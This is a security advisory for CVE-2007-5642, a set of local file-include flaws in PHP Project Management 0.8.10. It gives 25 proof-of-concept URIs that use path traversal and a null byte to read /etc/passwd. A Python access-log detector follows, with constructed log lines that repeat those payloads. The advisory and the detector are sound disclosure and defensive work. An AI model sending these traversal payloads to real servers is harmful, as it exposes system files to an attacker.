PHP Project Management Multiple Local File Include Vulnerabilities
BID:26148
Info
| Bugtraq ID: | 26148 |
| Class: | Input Validation Error |
| CVE: | CVE-2007-5642 |
| Remote: | Yes |
| Local: | No |
| Published: | Oct 21 2007 12:00AM |
| Updated: | May 07 2015 05:34PM |
| Credit: | GoLd_M discovered these vulnerabilities. |
| Vulnerable: | PHP Project Management PHP Project Management 0.8.10 |
| Not Vulnerable: | |
Discussion
PHP Project Management is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
Exploiting these issues may allow an unauthorized remote user to view files and execute local scripts in the context of the webserver process.
These issues affect PHP Project Management 0.8.10 and prior versions.
Exploit / POC
Attackers can exploit these issues via a browser.
The following proof-of-concept URIs are available:
http://www.example.com/modules/certinfo/index.php?module=../../../../../../etc/passwd%00
http://www.example.com/modules/emails/index.php?module=../../../../../../etc/passwd%00
http://www.example.com/modules/events/index.php?module=../../../../../../etc/passwd%00
http://www.example.com/modules/fax/index.php?module=../../../../../../etc/passwd%00
http://www.example.com/modules/files/index.php?module=../../../../../../etc/passwd%00
http://www.example.com/modules/files/list.php?def_lang=../../../../../../../../../etc/passwd%00
http://www.example.com/modules/groupadm/index.php?module=../../../../../../etc/passwd%00
http://www.example.com/modules/history/index.php?module=../../../../../../etc/passwd%00
http://www.example.com/modules/info/index.php?module=../../../../../../etc/passwd%00
http://www.example.com/modules/log/index.php?module=../../../../../../etc/passwd%00
http://www.example.com/modules/mail/index.php?module=../../../../../../etc/passwd%00
http://www.example.com/modules/messages/index.php?module=../../../../../../etc/passwd%00
http://www.example.com/modules/organizations/index.php?module=../../../../../../etc/passwd%00
http://www.example.com/modules/phones/index.php?module=../../../../../../etc/passwd%00
http://www.example.com/modules/presence/index.php?module=../../../../../../etc/passwd%00
http://www.example.com/modules/projects/index.php?module=../../../../../../etc/passwd%00
http://www.example.com/modules/projects/summary.inc.php?m_path=../../../../../../etc/passwd%00
http://www.example.com/modules/projects/list.php?module=../../../../../../etc/passwd%00
http://www.example.com/modules/reports/index.php?module=../../../../../../etc/passwd%00
http://www.example.com/modules/search/index.php?module=../../../../../../etc/passwd%00
http://www.example.com/modules/snf/index.php?module=../../../../../../etc/passwd%00
http://www.example.com/modules/syslog/index.php?module=../../../../../../etc/passwd%00
http://www.example.com/modules/tasks/index.php?module=../../../../../../etc/passwd%00
http://www.example.com/modules/tasks/summary.inc.php?m_path=../../../../../../etc/passwd%00
http://www.example.com/modules/useradm/index.php?module=../../../../../../etc/passwd%00
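The requests above all have the same shape: a traversal sequence and a trailing %00 in the module, def_lang or m_path parameter, which makes them straightforward to spot in web server access logs. The following detector is an added example, not part of the advisory or of PHP Project Management itself; the log lines are constructed, and the double-encoded variant is an assumption about how such a request might be obfuscated.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Parameters the advisory (BID 26148) names as reaching include(): "module" in the
# modules/*/index.php and list.php scripts, "def_lang" in modules/files/list.php,
# and "m_path" in the summary.inc.php scripts.
SUSPECT_PARAMS = {"module", "def_lang", "m_path"}

_REQ_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[0-9.]+"')  # combined-log request field

def decode_fully(value: str, rounds: int = 3) -> str:
    """Percent-decode until stable so a double-encoded %252e%252e is caught as well."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_lfi_value(raw: str) -> bool:
    """True if a value looks like a traversal or null-byte include attempt."""
    v = decode_fully(raw)
    if "\x00" in v:  # %00 is what truncates the suffix the script appends to the path
        return True
    v = v.replace("\\", "/")
    return ".." in v.split("/") or v.startswith("/")  # traversal segment or absolute path

def scan_log_line(line: str) -> list:
    """Flagged (param, decoded_value) pairs for one access-log line."""
    m = _REQ_RE.search(line)
    if not m:
        return []
    query = urlsplit(m.group("target")).query
    return [(name, decode_fully(value))
            for name, value in parse_qsl(query, keep_blank_values=True)
            if name in SUSPECT_PARAMS and is_lfi_value(value)]

def scan_log(text: str) -> list:
    """[(line_number, hits), ...] for each flagged line of an access log."""
    lines = enumerate(text.splitlines(), 1)
    return [(n, h) for n, line in lines if (h := scan_log_line(line))]

# Constructed sample lines, not real traffic: PoC-style requests for each parameter
# the advisory lists (one double-encoded), plus a benign request that must not fire.
SAMPLE_LOG = """\
203.0.113.5 - - [21/Oct/2007:10:00:01 +0000] "GET /modules/certinfo/index.php?module=../../../../../../etc/passwd%00 HTTP/1.1" 200 1532
203.0.113.5 - - [21/Oct/2007:10:00:02 +0000] "GET /modules/files/list.php?def_lang=../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1532
203.0.113.5 - - [21/Oct/2007:10:00:03 +0000] "GET /modules/tasks/summary.inc.php?m_path=%252e%252e/%252e%252e/etc/passwd HTTP/1.1" 200 1532
198.51.100.9 - - [21/Oct/2007:10:00:04 +0000] "GET /modules/tasks/index.php?module=tasks HTTP/1.1" 200 4096
"""
```

Running scan_log(SAMPLE_LOG) flags the first three lines and leaves the benign module=tasks request alone; the decoded value in each hit is what the script would have tried to include.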
Solution / Fix
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
References:
- PHP Project Management Homepage (PHP Project Management)
- PHP Project Management SourceForge Page (PHP Project Management)